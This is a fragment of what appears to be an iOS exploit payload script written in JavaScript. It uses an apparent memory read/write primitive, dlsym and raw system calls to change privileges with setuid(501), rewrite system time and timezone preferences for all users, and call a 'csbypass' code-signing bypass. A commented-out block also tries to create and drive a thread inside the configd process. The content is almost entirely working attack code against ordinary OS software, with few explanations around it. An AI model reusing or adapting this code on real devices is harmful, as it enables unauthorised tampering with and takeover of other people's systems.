1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
|
/*
var port_addr = shit_heap(4);
var kr = bootstrap_look_up(bootstrap_port, "com.apple.SystemConfiguration.configd", port_addr);
scall("printf", "%d (%s) %x %x\n", kr, mach_error_string(kr), port_addr, read_u32(port_addr));
printf("where u at\n");
// kr = vm_write(read_u32(port_addr), 0x41414141, port_addr & (~0xfff), 4);
scall("printf", "%d (%s)\n", kr, mach_error_string(kr));
var child_threadptr = shit_heap(4);
printf("where u at\n");
var child_thread;
printf("where u at\n");
var thread_state = shit_heap(0x1000);
printf("where u at\n");
var port = read_u32(port_addr);
printf("where u at\n");
kr = thread_create(port, child_threadptr);
scall("printf", "%d (%s)\n", kr, mach_error_string(kr));
printf("where u at\n");
child_thread = read_u32(child_thread);
printf("where u at\n");
kr = calls4arg("thread_set_state", child_thread, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
scall("printf", "%d (%s)\n", kr, mach_error_string(kr));
printf("where u at\n");
kr = calls4arg("thread_resume", child_thread, 0, 0, 0);
scall("printf", "%d (%s)\n", kr, mach_error_string(kr));
printf("where u at\n");*/
kCFBooleanFalse = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFBooleanFalse");
kCFBooleanTrue = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFBooleanTrue");
kCFPreferencesAnyUser = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFPreferencesAnyUser");
kCFPreferencesCurrentHost = dlsym(dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", RTLD_NOW), "kCFPreferencesCurrentHost");
printf("%x\n", kCFBooleanFalse);
// setuid(read_u32(getpwnam("_timed") + 8));
setuid(501);
printf("%d\n", getuid());
// call4arg(0, 0, 0, 0, 0);
CFPreferencesSetValue(__CFStringMakeConstantString("Active"), read_u32(kCFBooleanFalse), __CFStringMakeConstantString("com.apple.timezone.auto"), read_u32(kCFPreferencesAnyUser), read_u32(kCFPreferencesCurrentHost));
CFPreferencesSynchronize(__CFStringMakeConstantString('com.apple.timezone.auto'), read_u32(kCFPreferencesAnyUser), read_u32(kCFPreferencesCurrentHost));
CFPreferencesSetValue(__CFStringMakeConstantString("TMAutomaticTimeOnlyEnabled"), read_u32(kCFBooleanFalse), __CFStringMakeConstantString("com.apple.timed"), read_u32(kCFPreferencesAnyUser), read_u32(kCFPreferencesCurrentHost));
CFPreferencesSetValue(__CFStringMakeConstantString("TMAutomaticTimeZoneEnabled"), read_u32(kCFBooleanFalse), __CFStringMakeConstantString("com.apple.timed"), read_u32(kCFPreferencesAnyUser), read_u32(kCFPreferencesCurrentHost));
CFPreferencesSynchronize(__CFStringMakeConstantString('com.apple.timed'), read_u32(kCFPreferencesAnyUser), read_u32(kCFPreferencesCurrentHost));
return;
csbypass();
return;
|
